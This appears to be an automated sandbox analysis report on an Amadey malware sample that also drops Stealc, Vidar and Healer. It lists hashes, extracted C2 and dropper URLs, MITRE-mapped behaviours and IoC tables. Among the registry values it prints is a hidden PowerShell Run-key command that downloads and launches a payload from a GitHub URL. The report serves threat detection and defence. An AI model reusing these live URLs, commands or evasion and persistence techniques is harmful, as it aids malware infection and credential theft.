amadey | 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a

Analysis

max time kernel
150s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
24/03/2025, 09:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
Size

938KB
MD5

278fa6cdc2189c33b3cf59614d6d9e7f
SHA1

f382716bf5dc31ee6cdac0a1f9890a5164d0c18e
SHA256

86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a
SHA512

76cdd7a6b9e45ae8413f60e0369d045bfd1bfc3e879e0fac54c1303d312813380dc8907aeaf5e6525b47aa9c3768bac99c58fd1f7a2a38f5f193b5d55ebbf9c6
SSDEEP

24576:eqDEvCTbMWu7rQYlBQcBiT6rprG8a0uu:eTvC/MTQYxsWR7a0u

Score

10^/10

amadey healer stealc vidar 092155 trump bootkit credential_access defense_evasion discovery dropper execution exploit persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral2/memory/6024-709-0x0000000000400000-0x0000000000867000-memory.dmp	family_vidar_v7
behavioral2/memory/6024-20974-0x0000000000400000-0x0000000000867000-memory.dmp	family_vidar_v7

Detects Healer an antivirus disabler dropper 2 IoCs

resource	yara_rule
behavioral2/memory/7160-53360-0x00000000007F0000-0x0000000000C32000-memory.dmp	healer
behavioral2/memory/7160-53361-0x00000000007F0000-0x0000000000C32000-memory.dmp	healer

Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1836 created 2580	1836	Organizations.com	42

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	advnrNo.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE

Blocklisted process makes network request 3 IoCs

flow	pid	Process
22	4584	powershell.exe
338	7312	powershell.exe
420	9460	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4584	powershell.exe
7312	powershell.exe
9460	powershell.exe
4728	powershell.exe
11152	powershell.exe
8288	powershell.exe
8708	powershell.exe
9028	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 14 IoCs

flow	pid	Process
88	804	svchost.exe
134	4304	rapes.exe
568	10964	svchost.exe
65	4304	rapes.exe
538	4304	rapes.exe
30	4304	rapes.exe
30	4304	rapes.exe
223	4304	rapes.exe
223	4304	rapes.exe
223	4304	rapes.exe
22	4584	powershell.exe
107	4304	rapes.exe
338	7312	powershell.exe
420	9460	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\b5e51aa1.sys	d91c7611.exe
File created	C:\Windows\System32\Drivers\klupd_b5e51aa1a_arkmon.sys	d91c7611.exe
File created	C:\Windows\System32\Drivers\klupd_b5e51aa1a_klbg.sys	d91c7611.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
4688	takeown.exe
4904	icacls.exe

Sets service image path in registry 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\V60vTp_2040\ImagePath = "\\??\\C:\\Windows\\Temp\\T076SXg_2040.sys"	tzutil.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\b5e51aa1\ImagePath = "System32\\Drivers\\b5e51aa1.sys"	d91c7611.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b5e51aa1a_arkmon\ImagePath = "System32\\Drivers\\klupd_b5e51aa1a_arkmon.sys"	d91c7611.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b5e51aa1a_klbg\ImagePath = "System32\\Drivers\\klupd_b5e51aa1a_klbg.sys"	d91c7611.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b5e51aa1a_klark\ImagePath = "System32\\Drivers\\klupd_b5e51aa1a_klark.sys"	d91c7611.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b5e51aa1a_mark\ImagePath = "System32\\Drivers\\klupd_b5e51aa1a_mark.sys"	d91c7611.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b5e51aa1a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_b5e51aa1a_arkmon.sys"	d91c7611.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 8 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
380	chrome.exe
640	chrome.exe
5180	chrome.exe
4884	chrome.exe
5608	chrome.exe
13012	msedge.exe
6420	msedge.exe
6412	msedge.exe

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	advnrNo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	advnrNo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	11.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	11.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	advnrNo.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	zx4PJh6.exe

Deletes itself 1 IoCs

pid	Process
1088	w32tm.exe

Executes dropped EXE 22 IoCs

pid	Process
1580	Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE
4304	rapes.exe
2536	zx4PJh6.exe
1836	Organizations.com
6024	advnrNo.exe
824	OkH8IPF.exe
672	y0u3d_003.exe
4976	tK0oYx3.exe
2040	tzutil.exe
1088	w32tm.exe
1236	rapes.exe
7824	apple.exe
7968	11.exe
3356	11.exe
11192	3ff3734d.exe
12132	d91c7611.exe
9624	Jq0hGDZ.exe
3228	32ae679328.exe
8072	TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE
9880	483d2fa8a0d53818306efeb32d3.exe
10460	QL4t9UZ.exe
10824	laf6w_001.exe

Identifies Wine through registry keys 2 TTPs 6 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	advnrNo.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	rapes.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b5e51aa1.sys	d91c7611.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b5e51aa1.sys\ = "Driver"	d91c7611.exe

Loads dropped DLL 26 IoCs

pid	Process
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe
12132	d91c7611.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4904	icacls.exe
4688	takeown.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 10 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Service 470 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\10317340101\\Jq0hGDZ.exe\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\32ae679328.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10318740101\\32ae679328.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUpdate = "cmd /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"Start-Sleep -s 30; Start-Process 'C:\\Users\\Admin\\AppData\\Roaming\\win_init.exe' -WindowStyle Hidden\""	QL4t9UZ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\df513079-9927-45c9-969d-fda124fb67ed = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{007ffd04-f795-4b5a-bf8e-373bfffa4394}\\df513079-9927-45c9-969d-fda124fb67ed.cmd\""	d91c7611.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10318750121\\am_no.cmd"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate = "cmd /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\\Users\\Admin\\AppData\\Roaming\\win_init.exe'\""	QL4t9UZ.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {7621FABD-8E1C-4682-ACCD-F95D288F67B3}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {7621FABD-8E1C-4682-ACCD-F95D288F67B3}"	svchost.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\KasperskyLab	d91c7611.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	d91c7611.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
517	pastebin.com
519	pastebin.com

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	d91c7611.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000800000002422a-21360.dat	autoit_exe
behavioral2/files/0x000300000002197d-53296.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 6 IoCs

discovery

Process Discovery

T1057

pid	Process
10936	tasklist.exe
13644	tasklist.exe
1780	tasklist.exe
1656	tasklist.exe
10548	tasklist.exe
10824	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

pid	Process
1580	Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE
4304	rapes.exe
6024	advnrNo.exe
1236	rapes.exe
8072	TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE
9880	483d2fa8a0d53818306efeb32d3.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 824 set thread context of 4584	824	OkH8IPF.exe	131
PID 4976 set thread context of 4688	4976	tK0oYx3.exe	166

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	3ff3734d.exe
File opened (read-only)	\??\VBoxMiniRdrDN	d91c7611.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\CylinderPair	zx4PJh6.exe
File created	C:\Windows\Tasks\rapes.job	Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE
File opened for modification	C:\Windows\NecessityInfections	zx4PJh6.exe
File opened for modification	C:\Windows\VancouverPulse	zx4PJh6.exe
File opened for modification	C:\Windows\GuaranteesFear	zx4PJh6.exe
File opened for modification	C:\Windows\InvestingTr	zx4PJh6.exe
File opened for modification	C:\Windows\OfficeForbes	zx4PJh6.exe
File opened for modification	C:\Windows\SheDrum	zx4PJh6.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
9168	sc.exe
9188	sc.exe
9332	sc.exe
9900	sc.exe
8376	sc.exe
1176	sc.exe
8944	sc.exe
9708	sc.exe
9816	sc.exe
10132	sc.exe
9376	sc.exe
9540	sc.exe
9932	sc.exe
10036	sc.exe
9568	sc.exe
1944	sc.exe
8460	sc.exe
4768	sc.exe
9684	sc.exe
5988	sc.exe
8784	sc.exe
9084	sc.exe
9424	sc.exe
9792	sc.exe
10000	sc.exe
10572	sc.exe
4764	sc.exe
4216	sc.exe
4316	sc.exe
8504	sc.exe
8712	sc.exe
8820	sc.exe
824	sc.exe
9256	sc.exe
9456	sc.exe
10200	sc.exe
8596	sc.exe
9040	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	d91c7611.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	d91c7611.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3592	1836	WerFault.exe	121

System Location Discovery: System Language Discovery 1 TTPs 51 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zx4PJh6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3ff3734d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
